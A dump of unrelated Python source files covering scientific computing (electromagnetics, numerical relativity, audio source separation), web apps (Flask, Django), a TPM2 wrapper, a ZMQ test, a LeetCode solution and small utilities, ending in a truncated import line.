problem.mesh, self.sigmaPrimary, self.freq)
return self._ePrimary
def bPrimary(self, problem):
# Project ePrimary to bPrimary
# Satisfies the primary(background) field conditions
if problem.mesh.dim == 1:
C = problem.mesh.nodalGrad
elif problem.mesh.dim == 3:
C = problem.mesh.edgeCurl
bBG_bp = (
(- C * self.ePrimary(problem)) *
(1 / (1j * omega(self.freq))))
return bBG_bp
def S_e(self, problem):
"""
Get the electrical field source
"""
e_p = self.ePrimary(problem)
Map_sigma_p = Maps.SurjectVertical1D(problem.mesh)
sigma_p = Map_sigma_p._transform(self.sigma1d)
# Make mass matrix
# Note: M(sig) - M(sig_p) = M(sig - sig_p)
# Need to deal with the edge/face discrepencies between 1d/2d/3d
if problem.mesh.dim == 1:
Mesigma = problem.mesh.getFaceInnerProduct(problem.sigma)
Mesigma_p = problem.mesh.getFaceInnerProduct(sigma_p)
if problem.mesh.dim == 2:
pass
if problem.mesh.dim == 3:
Mesigma = problem.MeSigma
Mesigma_p = problem.mesh.getEdgeInnerProduct(sigma_p)
return (Mesigma - Mesigma_p) * e_p
def S_eDeriv_m(self, problem, v, adjoint=False):
'''
Get the derivative of S_e wrt to sigma (m)
'''
# Need to deal with
if problem.mesh.dim == 1:
# Need to use the faceInnerProduct
MsigmaDeriv = (
problem.mesh.getFaceInnerProductDeriv(
problem.sigma)(self.ePrimary(problem)[:, 1]) *
problem.sigmaDeriv)
# MsigmaDeriv = ( MsigmaDeriv * MsigmaDeriv.T)**2
if problem.mesh.dim == 2:
pass
if problem.mesh.dim == 3:
# Need to take the derivative of both u_px and u_py
ePri = self.ePrimary(problem)
if adjoint:
return (
problem.MeSigmaDeriv(
ePri[:, 0], v[:int(v.shape[0]/2)], adjoint
) +
problem.MeSigmaDeriv(
ePri[:, 1], v[int(v.shape[0]/2):], adjoint
)
)
# return sp.hstack((
# problem.MeSigmaDeriv(ePri[:, 0]).T,
# problem.MeSigmaDeriv(ePri[:, 1]).T)) * v
else:
return np.hstack((
mkvc(problem.MeSigmaDeriv(ePri[:, 0], v, adjoint), 2),
mkvc(problem.MeSigmaDeriv(ePri[:, 1], v, adjoint), 2)
))
if adjoint:
#
return MsigmaDeriv.T * v
else:
# v should be nC size
return MsigmaDeriv * v
|
py | 7dfd12c43abf5401c01cdb8fa979998733d45dfc | # @l2g 2032 python3
# [2032] Two Out of Three
# Difficulty: Easy
# https://leetcode.com/problems/two-out-of-three
#
# Given three integer arrays nums1,nums2,and nums3,
# return a distinct array containing all the values that are present in at least two out of the three arrays.
# You may return the values in any order.
#
# Example 1:
#
# Input: nums1 = [1,1,3,2], nums2 = [2,3], nums3 = [3]
# Output: [3,2]
# Explanation: The values that are present in at least two arrays are:
# - 3, in all three arrays.
# - 2, in nums1 and nums2.
#
# Example 2:
#
# Input: nums1 = [3,1], nums2 = [2,3], nums3 = [1,2]
# Output: [2,3,1]
# Explanation: The values that are present in at least two arrays are:
# - 2, in nums2 and nums3.
# - 3, in nums1 and nums2.
# - 1, in nums1 and nums3.
#
# Example 3:
#
# Input: nums1 = [1,2,2], nums2 = [4,3,3], nums3 = [5]
# Output: []
# Explanation: No value is present in at least two arrays.
#
#
# Constraints:
#
# 1 <= nums1.length, nums2.length, nums3.length <= 100
# 1 <= nums1[i], nums2[j], nums3[k] <= 100
#
#
from typing import List
class Solution:
def twoOutOfThree(self, nums1: List[int], nums2: List[int], nums3: List[int]) -> List[int]:
ans = set()
set_1 = set(nums1)
set_2 = set(nums2)
set_3 = set(nums3)
ans = ans | (set_1 & set_2)
ans = ans | (set_2 & set_3)
ans = ans | (set_3 & set_1)
return list(ans)
if __name__ == "__main__":
import os
import pytest
pytest.main([os.path.join("tests", "test_2032.py")])
|
py | 7dfd12cc1694f6d53b708f59b84ee687147ee292 | # -*- coding: utf-8 -*-
# all the imports
import os
import sqlite3
from flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash
app = Flask(__name__) # create the application instance :)
app.config.from_object(__name__) # load config from this file, flaskr.py
# Load default config and override config from an environment variable
app.config.update(dict(
DATABASE=os.path.join(app.root_path, 'alacenapp.db'),
SECRET_KEY='development key',
USERNAME='admin',
PASSWORD='default'
))
app.config.from_envvar('FLASKR_SETTINGS', silent=True)
def connect_db():
"""Connects to the specific database"""
rv = sqlite3.connect(app.config['DATABASE'])
rv.row_factory = sqlite3.Row
return rv
def get_db():
"""Opens a new database connection if there is none yet for the current application context
"""
if not hasattr(g, 'sqlite_db'):
g.sqlite_db = connect_db()
return g.sqlite_db
@app.teardown_appcontext
def close_db(error):
"""Closes the database again at the end of the request."""
if hasattr(g, 'sqlite_db'):
g.sqlite_db.close()
def init_db():
db = get_db()
with app.open_resource('schema.sql', mode='r') as f:
db.cursor().executescript(f.read())
db.commit()
@app.cli.command('initdb')
def initdb_command():
"""Initializes the database."""
init_db()
print('Initialized the database.')
@app.route('/')
def show_entries():
db = get_db()
cur = db.execute('select title, text from entries order by id desc')
entries = cur.fetchall()
return render_template('show_entries.html',entries=entries)
@app.route('/add', methods=['POST'])
def add_entry():
if not session.get('logged_in'):
abort(401)
db = get_db()
db.execute('insert into entries (title, text) values (?, ?)',
[request.form['title'], request.form['text']])
db.commit()
flash('New entry was succesfully posted')
return redirect(url_for('show entries'))
@app.route('/login', methods=['GET', 'POST'])
def login():
error = None
if request.method == 'POST':
if request.form['username'] != app.config['USERNAME']:
error = 'Invalid username'
elif request.form['password'] != app.config['PASSWORD']:
error = 'Invalid password'
else:
session['logged_in'] = True
flash('You were logged in')
return redirect(url_for('show_entries'))
return render_template('login.html', error=error)
@app.route('/logout')
def logout():
session.pop('logged_in', None)
flash('You were logged out')
return redirect(url_for('show_entries'))
|
py | 7dfd132d0e58de7633ffb7978ceb26338adec682 | # This module provides functions for setting up Curvilinear boundary conditions,
# as documented in Tutorial-Start_to_Finish-Curvilinear_BCs.ipynb
# Author: Zachariah B. Etienne
# zachetie **at** gmail **dot* com
# First we import needed core NRPy+ modules
from outputC import *
import NRPy_param_funcs as par
import grid as gri
import loop as lp
import indexedexp as ixp
import finite_difference as fin
import reference_metric as rfm
import sys
def Set_up_CurviBoundaryConditions(outdir="CurviBoundaryConditions/",verbose=True):
# Step 0: Set up reference metric in case it hasn't already been set up.
# (Doing it twice hurts nothing).
rfm.reference_metric()
# Step 1: Set unit-vector dot products (=parity) for each of the 10 parity condition types
parity = ixp.zerorank1(DIM=10)
UnitVectors_inner = ixp.zerorank2()
xx0_inbounds, xx1_inbounds, xx2_inbounds = sp.symbols("xx0_inbounds xx1_inbounds xx2_inbounds", real=True)
for i in range(3):
for j in range(3):
UnitVectors_inner[i][j] = rfm.UnitVectors[i][j].subs(rfm.xx[0], xx0_inbounds).subs(rfm.xx[1],
xx1_inbounds).subs(
rfm.xx[2], xx2_inbounds)
# Type 0: scalar
parity[0] = sp.sympify(1)
# Type 1: i0-direction vector or one-form
# Type 2: i1-direction vector or one-form
# Type 3: i2-direction vector or one-form
for i in range(3):
for Type in range(1, 4):
parity[Type] += rfm.UnitVectors[Type - 1][i] * UnitVectors_inner[Type - 1][i]
# Type 4: i0i0-direction rank-2 tensor
# parity[4] = parity[1]*parity[1]
# Type 5: i0i1-direction rank-2 tensor
# Type 6: i0i2-direction rank-2 tensor
# Type 7: i1i1-direction rank-2 tensor
# Type 8: i1i2-direction rank-2 tensor
# Type 9: i2i2-direction rank-2 tensor
count = 4
for i in range(3):
for j in range(i, 3):
parity[count] = parity[i + 1] * parity[j + 1]
count = count + 1
lhs_strings = []
for i in range(10):
lhs_strings.append("parity[" + str(i) + "]")
outputC(parity, lhs_strings, outdir + "parity_conditions_symbolic_dot_products.h")
# Step 2.a: Generate outdir+gridfunction_defines.h file,
# containing human-readable gridfunction aliases
evolved_variables_list, auxiliary_variables_list, auxevol_variables_list = gri.output__gridfunction_defines_h__return_gf_lists(outdir)
# Step 2.b: set the parity conditions on all gridfunctions in gf_list,
# based on how many digits are at the end of their names
def set_parity_types(gf_list):
parity_type = []
for i in range(len(gf_list)):
varname = gf_list[i]
parity_type__orig_len = len(parity_type)
if len(varname) > 2:
if varname[-2] == "0" and varname[-1] == "0": # In Python, a[-1] points to the last
# element of a list; a[-2] the
# second-to-last element, etc.
parity_type.append(4)
elif varname[-2] == "0" and varname[-1] == "1":
parity_type.append(5)
elif varname[-2] == "0" and varname[-1] == "2":
parity_type.append(6)
elif varname[-2] == "1" and varname[-1] == "1":
parity_type.append(7)
elif varname[-2] == "1" and varname[-1] == "2":
parity_type.append(8)
elif varname[-2] == "2" and varname[-1] == "2":
parity_type.append(9)
if len(varname) > 1 and len(parity_type) == parity_type__orig_len:
if varname[-1] == "0":
parity_type.append(1)
elif varname[-1] == "1":
parity_type.append(2)
elif varname[-1] == "2":
parity_type.append(3)
if varname[len(varname) - 1].isdigit() == False:
parity_type.append(0)
if len(parity_type) == parity_type__orig_len:
print("Error: Could not figure out parity type for evolved variable: " + varname)
sys.exit(1)
return parity_type
evol_parity_type = set_parity_types(evolved_variables_list)
aux_parity_type = set_parity_types(auxiliary_variables_list)
auxevol_parity_type = set_parity_types(auxevol_variables_list)
# Step 2.c: Output all gridfunctions to outdir+"/gridfunction_defines.h"
# ... then append to the file the parity type for each gridfunction.
with open(outdir + "/gridfunction_defines.h", "a") as file:
file.write("\n\n/* PARITY TYPES FOR ALL GRIDFUNCTIONS.\n")
file.write(
" SEE \"Tutorial-Start_to_Finish-Curvilinear_BCs.ipynb\" FOR DEFINITIONS. */\n")
if len(evolved_variables_list) > 0:
file.write("const int8_t evol_gf_parity[" + str(len(evolved_variables_list)) + "] = { ")
for i in range(len(evolved_variables_list) - 1):
file.write(str(evol_parity_type[i]) + ", ")
file.write(str(evol_parity_type[len(evolved_variables_list) - 1]) + " };\n")
if len(auxiliary_variables_list) > 0:
file.write("const int8_t aux_gf_parity[" + str(len(auxiliary_variables_list)) + "] = { ")
for i in range(len(auxiliary_variables_list) - 1):
file.write(str(aux_parity_type[i]) + ", ")
file.write(str(aux_parity_type[len(auxiliary_variables_list) - 1]) + " };\n")
if len(auxevol_variables_list) > 0:
file.write("const int8_t auxevol_gf_parity[" + str(len(auxevol_variables_list)) + "] = { ")
for i in range(len(auxevol_variables_list) - 1):
file.write(str(auxevol_parity_type[i]) + ", ")
file.write(str(auxevol_parity_type[len(auxevol_variables_list) - 1]) + " };\n")
if verbose == True:
for i in range(len(evolved_variables_list)):
print("Evolved gridfunction \"" + evolved_variables_list[i] + "\" has parity type " + str(
evol_parity_type[i]) + ".")
for i in range(len(auxiliary_variables_list)):
print("Auxiliary gridfunction \"" + auxiliary_variables_list[i] + "\" has parity type " + str(
aux_parity_type[i]) + ".")
for i in range(len(auxevol_variables_list)):
print("AuxEvol gridfunction \"" + auxevol_variables_list[i] + "\" has parity type " + str(
auxevol_parity_type[i]) + ".")
# Step 3: Find the Eigen-Coordinate and set up the Eigen-Coordinate's reference metric:
CoordSystem_orig = par.parval_from_str("reference_metric::CoordSystem")
par.set_parval_from_str("reference_metric::CoordSystem", rfm.get_EigenCoord())
rfm.reference_metric()
# Step 4: Output C code for the Eigen-Coordinate mapping from xx->Cartesian:
rfm.xxCart_h("EigenCoord_xxCart", "../set_Cparameters.h", outdir + "EigenCoord_xxCart.h")
# Step 5: Output the Eigen-Coordinate mapping from Cartesian->xx:
# Step 5.a: Sanity check: First make sure that rfm.Cart_to_xx has been set. Error out if not!
if rfm.Cart_to_xx[0] == 0 or rfm.Cart_to_xx[1] == 0 or rfm.Cart_to_xx[2] == 0:
print("ERROR: rfm.Cart_to_xx[], which maps Cartesian -> xx, has not been set for")
print(" reference_metric::CoordSystem = " + par.parval_from_str("reference_metric::CoordSystem"))
print(" Boundary conditions in curvilinear coordinates REQUIRE this be set.")
sys.exit(1)
# Step 5.b: Output C code for the Eigen-Coordinate mapping from Cartesian->xx:
outputC([rfm.Cart_to_xx[0], rfm.Cart_to_xx[1], rfm.Cart_to_xx[2]],
["Cart_to_xx0_inbounds", "Cart_to_xx1_inbounds", "Cart_to_xx2_inbounds"],
outdir + "EigenCoord_Cart_to_xx.h")
# Step 6: Restore reference_metric::CoordSystem back to the original CoordSystem
par.set_parval_from_str("reference_metric::CoordSystem", CoordSystem_orig)
rfm.reference_metric() |
py | 7dfd1488d683cdf9ac603a568f3c6f0788b53acc | from typing import Union, List, Callable
from hashlib import md5
class TagDesc:
__slots__ = ['tag', 'attrs', 'chld']
def __init__(self, tag: Union[str, bool], attrs: dict, chld: 'TagDesc'=None) -> None:
"""
tag: a tag selector (either a string with the tag name or a boolean for glob
attrs: a dict of the attributes of the tag should have
chld: a child selector, when you need to target more than one tag to query the right element
"""
self.tag = tag
self.attrs = attrs
self.chld = chld
class Filter:
__slots__ = ['content', 'next', 'exclude', 'flatten', 'transform']
def __init__(self, content: TagDesc, next_chap: TagDesc, exclude: List[TagDesc],
flatten:List[TagDesc]=None, transform:List[Callable[[str],str]]=None) -> None:
"""
content: a selector for the tag that contains the text
next_chap: a selector for the tag that contains the url
exclude: a list of selectors to remove from the extracted document
flatten: a list of selectors to flatten (i.e. remove the tags but keep the text) from the document
transform: a list of functions to run over the final text
"""
self.content = content
self.next = next_chap
self.exclude = exclude
if flatten is None:
flatten = []
self.flatten = flatten
if transform is None:
transform = []
self.transform = transform
class BookAttrs:
__slots__ = ['identifier', 'title', 'abbrev', 'lang', 'author']
def __init__(self, title: str, abbrev: str, lang='en', author='generated') -> None:
self.identifier = md5(title.encode()).hexdigest()
self.title = title
self.abbrev = abbrev
self.lang = 'en'
self.author = author
class Page:
__slots__ = ['next', 'contents']
def __init__(self, contents: str, next_page: str) -> None:
self.next = next_page
self.contents = contents
def __str__(self) -> str:
return 'Page(contents={}, next={})'.format(repr(self.contents), repr(self.next))
|
py | 7dfd14c83bfbec09c4268e7248fc1b9618edc673 | # sample of spectrum meter
import sys
import json
def quote(s):
return '"' + s + '"'
def print_header(config):
print('Header,2.1,0,0')
return
def print_model_info(config):
print('ModelInfo,"{0}","","",""'.format(
config['METER_MODEL_NAME']))
return
def print_vertexes(config):
V_TEMPLATE='Vertex,0,-1,1,0,0,0,-1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"b01",1,"",0,"",0,"",0,0,0,0,0,0,0,0,0,0'
VT = V_TEMPLATE.split(',')
vno = 0
n_bands = len(config['BAND_DEFS'][config['BANDS']][0])
for band in range(n_bands):
for index in range(4):
VT[1] = str(vno)
vno += 1
if index % 2 == 0:
VT[2] = str(band * config['BAR_WIDTH'])
else:
VT[2] = str(
(band + 1) * config['BAR_WIDTH'] - config['BAR_SPACE'])
if index < 2:
VT[28] = quote(config['METER_BONE_NAME']).format(band)
VT[3] = '0'
else:
VT[28] = '"b{0}0"'.format(band)
VT[3] = '0'
print(','.join(VT))
return
def print_materials(config):
M_TEMPLATE = 'Material,"平面","",1,1,1,0.8,0,0,0,100,0.3,0.3,0.3,1,0,0,0,0,0,0,1,0,0,0,1,"","",1,"",""'
F_TEMPLATE = 'Face,"平面",0,0,1,2'
MT = M_TEMPLATE.split(',')
n_bands = len(config['BAND_DEFS'][config['BANDS']][0])
for band in range(n_bands):
MT[1] = '"band{0}"'.format(band)
MT[3] = MT[11] = str(config['BAR_RGB'][0]) #diffuse, env
MT[4] = MT[12] = str(config['BAR_RGB'][1])
MT[5] = MT[13] = str(config['BAR_RGB'][2])
MT[7] = '0' #specular
MT[8] = '0'
MT[9] = '0'
MT[6] = str(config['BAR_TRANSPARENCY'])
print(','.join(MT))
for band in range(n_bands):
vbase = band * 4
for i in range(2):
if i == 0:
ftext = 'Face,"band{0}",{1},{2},{3},{4}'.format(
band, i, vbase, vbase + 1, vbase + 2, vbase + 3)
else:
ftext = 'Face,"band{0}",{1},{2},{3},{4}'.format(
band, i, vbase + 1, vbase + 3, vbase + 2)
print(ftext)
def print_bones(config):
B_TEMPLATE = 'Bone,"b00","",0,0,0,0,0,1,0,0,1,1,"",0,"",0,0,0,0,0,0,1,"",0,0,0,0,0,1,0,0,0,0,1,0,0,"",0,57.29578'
BT = B_TEMPLATE.split(',')
BT[1] = '"センター"'
BT[9] = '1'
print(','.join(BT))
BT[1] = '"bands_root"'
BT[9] = '1'
BT[13] = '"センター"'
print(','.join(BT))
n_bands = len(config['BAND_DEFS'][config['BANDS']][0])
for band in range(n_bands):
BT[5] = str(config['BAR_WIDTH'] * band + config['BAR_WIDTH'] / 2)
BT[1] = '"b{0}0"'.format(band)
BT[13] = '"bands_root"'
BT[9] = '0'
print(','.join(BT))
BT[13] = BT[1]
BT[1] = quote(config['METER_BONE_NAME']).format(band)
BT[9] = '1'
print(','.join(BT))
def print_morph(config):
M_TEMPLATE = 'Morph,"モーフ1","",4,2'
MT = M_TEMPLATE.split(',')
BM_TEMPLATE = 'BoneMorph,"モーフ1","b01",0,10,0,0,0,0'
BMT = BM_TEMPLATE.split(',')
n_bands = len(config['BAND_DEFS'][config['BANDS']][0])
for band in range(n_bands):
morph_name = quote(config['METER_MORPH_NAME']).format(band)
MT[1] = morph_name
print(','.join(MT))
BMT[1] = morph_name
BMT[2] = quote(config['METER_BONE_NAME']).format(band)
BMT[4] = str(config['BAR_HEIGHT'])
print(','.join(BMT))
MM_TEMPLATE = 'MaterialMorph,"0","band0",1,0,0,0,0,0,0,0,10,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0'
MMT = MM_TEMPLATE.split(',')
for band in range(n_bands):
morph_name = quote(config['VIEW_MORPH_NAME']).format(band)
MT[1] = morph_name
MT[4] = '8'
print(','.join(MT))
MMT[1] = morph_name
MMT[2] = '"band{0}"'.format(band)
print(','.join(MMT))
def print_nodes(config):
print('Node,"Root","Root"')
print('NodeItem,"Root",0,"センター"')
print('Node,"表情","Exp"')
n_bands = len(config['BAND_DEFS'][config['BANDS']][0])
for band in range(n_bands):
print(
('NodeItem, "表情", 1, ' + quote(config['METER_MORPH_NAME']))
.format(band))
for band in range(n_bands):
print(
('NodeItem, "表情", 1, ' + quote(config['VIEW_MORPH_NAME']))
.format(band))
print('Node,"bands",""')
print('NodeItem,"bands",0,"bands_root"')
for band in range(n_bands):
print(
('NodeItem, "bands", 0, ' + quote(config['METER_BONE_NAME']))
.format(band))
if __name__ == '__main__':
functions = [print_header, print_model_info, print_vertexes,
print_materials, print_bones, print_morph, print_nodes]
fp = open(sys.argv[1], 'r', encoding='utf-8')
config = json.load(fp)
fp.close()
for f in functions:
f(config)
|
py | 7dfd150e3112ac6a30079397d6a028afac417d6f | #!/usr/bin/env python2
# Copyright (c) 2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test ZMQ interface
#
from test_framework.test_framework import RavenDarkTestFramework
from test_framework.util import *
import zmq
import binascii
try:
import http.client as httplib
except ImportError:
import httplib
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
class ZMQTest (RavenDarkTestFramework):
port = 28332
def setup_nodes(self):
self.zmqContext = zmq.Context()
self.zmqSubSocket = self.zmqContext.socket(zmq.SUB)
self.zmqSubSocket.setsockopt(zmq.SUBSCRIBE, b"hashblock")
self.zmqSubSocket.setsockopt(zmq.SUBSCRIBE, b"hashtx")
self.zmqSubSocket.connect("tcp://127.0.0.1:%i" % self.port)
return start_nodes(4, self.options.tmpdir, extra_args=[
['-zmqpubhashtx=tcp://127.0.0.1:'+str(self.port), '-zmqpubhashblock=tcp://127.0.0.1:'+str(self.port)],
[],
[],
[]
])
def run_test(self):
self.sync_all()
genhashes = self.nodes[0].generate(1)
self.sync_all()
print "listen..."
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
blkhash = bytes_to_hex_str(body)
assert_equal(genhashes[0], blkhash) #blockhash from generate must be equal to the hash received over zmq
n = 10
genhashes = self.nodes[1].generate(n)
self.sync_all()
zmqHashes = []
for x in range(0,n*2):
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
if topic == b"hashblock":
zmqHashes.append(bytes_to_hex_str(body))
for x in range(0,n):
assert_equal(genhashes[x], zmqHashes[x]) #blockhash from generate must be equal to the hash received over zmq
#test tx from a second node
hashRPC = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1.0)
self.sync_all()
# now we should receive a zmq msg because the tx was broadcast
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
hashZMQ = ""
if topic == b"hashtx":
hashZMQ = bytes_to_hex_str(body)
assert_equal(hashRPC, hashZMQ) #blockhash from generate must be equal to the hash received over zmq
if __name__ == '__main__':
ZMQTest ().main ()
|
py | 7dfd16678fdc199cd2fb6114e3272757c5014aa7 | from django.db import models
from django.conf import settings
import os
def get_profileimg_path(instance, filename):
return os.path.join('profile_image', str(instance.accuser.pk), filename)
class Profile(models.Model):
accuser = models.OneToOneField(settings.AUTH_USER_MODEL,on_delete=models.CASCADE,)
nickname = models.CharField(max_length = 50)
bio = models.TextField(max_length = 100)
profileimg = models.ImageField(blank=True, upload_to=get_profileimg_path) |
py | 7dfd16d8c011e036778d81ac1f40a0ab904cd6b4 | """
Functions related to core conda functionality that relates to manually
installed Python packages, e.g. using "python setup.py install", or "pip".
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from io import open
import os
from os.path import isdir, isfile, join
import re
import sys
from .common.compat import itervalues, on_win
from .core.linked_data import linked_data
from .misc import rel_path
from .models.dist import Dist
def get_site_packages_dir(installed_pkgs):
for info in itervalues(installed_pkgs):
if info['name'] == 'python':
if on_win:
stdlib_dir = 'Lib'
else:
py_ver = info['version'][:3]
stdlib_dir = 'lib/python%s' % py_ver
return join(stdlib_dir, 'site-packages')
return None
def get_egg_info_files(sp_dir):
for fn in os.listdir(sp_dir):
if not fn.endswith(('.egg', '.egg-info', '.dist-info')):
continue
path = join(sp_dir, fn)
if isfile(path):
yield path
elif isdir(path):
for path2 in [join(path, 'PKG-INFO'),
join(path, 'EGG-INFO', 'PKG-INFO'),
join(path, 'METADATA')]:
if isfile(path2):
yield path2
pat = re.compile(r'(\w+):\s*(\S+)', re.I)
def parse_egg_info(path):
"""
Parse an .egg-info file and return its canonical distribution name
"""
info = {}
for line in open(path, encoding='utf-8'):
line = line.strip()
m = pat.match(line)
if m:
key = m.group(1).lower()
info[key] = m.group(2)
try:
return '%(name)s-%(version)s-<pip>' % info
except KeyError:
pass
return None
def get_egg_info(prefix, all_pkgs=False):
"""
Return a set of canonical names of all Python packages (in `prefix`),
by inspecting the .egg-info files inside site-packages.
By default, only untracked (not conda installed) .egg-info files are
considered. Setting `all_pkgs` to True changes this.
"""
installed_pkgs = linked_data(prefix)
sp_dir = get_site_packages_dir(installed_pkgs)
if sp_dir is None:
return set()
conda_files = set()
for info in itervalues(installed_pkgs):
conda_files.update(info.get('files', []))
res = set()
for path in get_egg_info_files(join(prefix, sp_dir)):
f = rel_path(prefix, path)
if all_pkgs or f not in conda_files:
try:
dist = parse_egg_info(path)
except UnicodeDecodeError:
dist = None
if dist:
res.add(Dist(dist))
return res
if __name__ == '__main__':
from pprint import pprint
pprint(get_egg_info(sys.prefix))
|
py | 7dfd174974e5687d75d8594524d8420924e95c03 | Numero = int(input(':Que termo deseja encontrar: '))
ultimo = 1
penultimo = 1
if (Numero == 1) or (Numero == 2):
print('1')
else:
for count in range(2,Numero):
termo = ultimo + penultimo
penultimo = ultimo
ultimo = termo
count += 1
print(termo)
|
py | 7dfd1816e134bb323053d9b7710aa8d4242c6728 | # encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http:# mozilla.org/MPL/2.0/.
#
# Author: Kyle Lahnakoski ([email protected])
#
from __future__ import absolute_import, division
import re
from mo_future import first
from mo_dots import Data, coalesce, is_data, listwrap, wrap_leaves
from mo_logs import Log, strings
from mo_times.dates import Date
GLOBALS = {
"true": True,
"false": False,
"null": None,
"EMPTY_DICT": {},
"coalesce": coalesce,
"listwrap": listwrap,
"Date": Date,
"Log": Log,
"Data": Data,
"re": re,
"wrap_leaves": wrap_leaves,
"is_data": is_data,
"first": first
}
def compile_expression(source, function_name="output"):
"""
THIS FUNCTION IS ON ITS OWN FOR MINIMAL GLOBAL NAMESPACE
:param source: PYTHON SOURCE CODE
:param function_name: OPTIONAL NAME TO GIVE TO OUTPUT FUNCTION
:return: PYTHON FUNCTION
"""
fake_locals = {}
try:
exec(
(
"def " + function_name + "(row, rownum=None, rows=None):\n" +
" _source = " + strings.quote(source) + "\n" +
" try:\n" +
" return " + source + "\n" +
" except Exception as e:\n" +
" Log.error(u'Problem with dynamic function {{func|quote}}', func=_source, cause=e)\n"
),
GLOBALS,
fake_locals,
)
except Exception as e:
Log.error(u"Bad source: {{source}}", source=source, cause=e)
return fake_locals["output"]
|
py | 7dfd18fd052a7940e41576e52c4b043ba022b4fb | from django.conf import settings
from mapentity.registry import registry
from . import models
app_name = 'maintenance'
urlpatterns = registry.register(models.Intervention, menu=settings.INTERVENTION_MODEL_ENABLED)
urlpatterns += registry.register(models.Project, menu=settings.PROJECT_MODEL_ENABLED)
|
py | 7dfd1900f3eba800e28a87a5aa6a931b20f24d69 | # Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
MSS Inference code using D3Net.
'''
import os
import argparse
import yaml
import numpy as np
import nnabla as nn
from nnabla.ext_utils import get_extension_context
from util import model_separate, save_stft_wav, generate_data
from filter import apply_mwf
from args import get_inference_args
def run_separation(args, fft_size=4096, hop_size=1024, n_channels=2, apply_mwf_flag=True, ch_flip_average=False):
# Set NNabla extention
ctx = get_extension_context(args.context)
nn.set_default_context(ctx)
for i, input_file in enumerate(args.inputs):
sample_rate, inp_stft = generate_data(
input_file, fft_size, hop_size, n_channels)
print(f"{i+1} / {len(args.inputs)} : {input_file}")
out_stfts = {}
inp_stft_contiguous = np.abs(np.ascontiguousarray(inp_stft))
for target in args.targets:
# Load the model weights for corresponding target
nn.load_parameters(f"{os.path.join(args.model_dir, target)}.h5")
with open(f"./configs/{target}.yaml") as file:
# Load target specific Hyper parameters
hparams = yaml.load(file, Loader=yaml.FullLoader)
with nn.parameter_scope(target):
out_sep = model_separate(
inp_stft_contiguous, hparams, ch_flip_average=ch_flip_average)
out_stfts[target] = out_sep * np.exp(1j * np.angle(inp_stft))
if apply_mwf_flag:
out_stfts = apply_mwf(out_stfts, inp_stft)
sub_dir_name = ''
output_subdir = args.out_dir + sub_dir_name
output_subdir = os.path.join(
output_subdir, os.path.splitext(os.path.basename(input_file))[0])
if not os.path.exists(output_subdir):
os.makedirs(output_subdir)
out = {}
for target in args.targets:
out[target] = save_stft_wav(out_stfts[target], hop_size, sample_rate, output_subdir + '/' +
target + '.wav', samplewidth=2)
if __name__ == '__main__':
run_separation(
get_inference_args(),
fft_size=4096,
hop_size=1024,
n_channels=2,
apply_mwf_flag=True,
ch_flip_average=True
)
|
py | 7dfd192b5715119b37e0b031a333726a135786a7 | """
SPDX-License-Identifier: BSD-2
"""
from ._libtpm2_pytss import ffi
from .utils import _chkrc
class TCTI:
def __init__(self, ctx):
self._v1 = ffi.cast("TSS2_TCTI_CONTEXT_COMMON_V1 *", ctx)
if self._v1.version == 2:
self._v2 = ffi.cast("TSS2_TCTI_CONTEXT_COMMON_V2 *", ctx)
else:
self._v2 = None
self._ctx = ctx
@property
def _tcti_context(self):
return self._ctx
@property
def magic(self):
return self._v1.magic
@property
def version(self):
return self._v1.version
def transmit(self, command):
cmd = ffi.new("uint8_t []", command)
clen = len(command)
_chkrc(self._v1.transmit(self._ctx, clen, cmd))
def receive(self, size=-1, timeout=-1):
if size == -1:
size = 4096
resp = ffi.new("uint8_t []", b"\x00" * size)
rsize = ffi.new("size_t *", size)
_chkrc(self._v1.receive(self._ctx, rsize, resp, timeout))
return bytes(ffi.buffer(resp, rsize[0]))
def finalize(self):
self._v1.finalize(self._ctx)
def cancel(self):
_chkrc(self._v1.cancel(self._ctx))
def get_poll_handles(self):
nhandles = ffi.new("size_t *", 0)
_chkrc(self._v1.getPollHandles(self._ctx, ffi.NULL, nhandles))
if nhandles[0] == 0:
return ()
handles = ffi.new("TSS2_TCTI_POLL_HANDLE []", nhandles[0])
_chkrc(self._v1.getPollHandles(self._ctx, handles, nhandles))
rh = []
for i in range(0, nhandles[0]):
rh.append(handles[i])
return tuple(rh)
def set_locality(self, locality):
_chkrc(self._v1.setLocality(self._ctx, locality))
def make_sticky(self, handle, sticky):
if self._v2 is None:
raise RuntimeError("unsupported by TCTI API version")
hptr = ffi.new("TPM2_HANDLE *", handle)
_chkrc(self._v2.makeSticky(self._ctx, hptr, sticky))
return hptr[0]
|
py | 7dfd197e98a1e6a4cb52d4b71f6213fa09463c62 | bind = '0.0.0.0:8084'
workers = 4
worker_class = 'gevent'
worker_connections = 1000
max_requests = int(workers * worker_connections)
keepalive = 2
max_requests_jitter = 5
timeout = 30
errorlog = '-' |
py | 7dfd19854be804f883ea2e92ecf5bab0dc42d24e | import base64, codecs
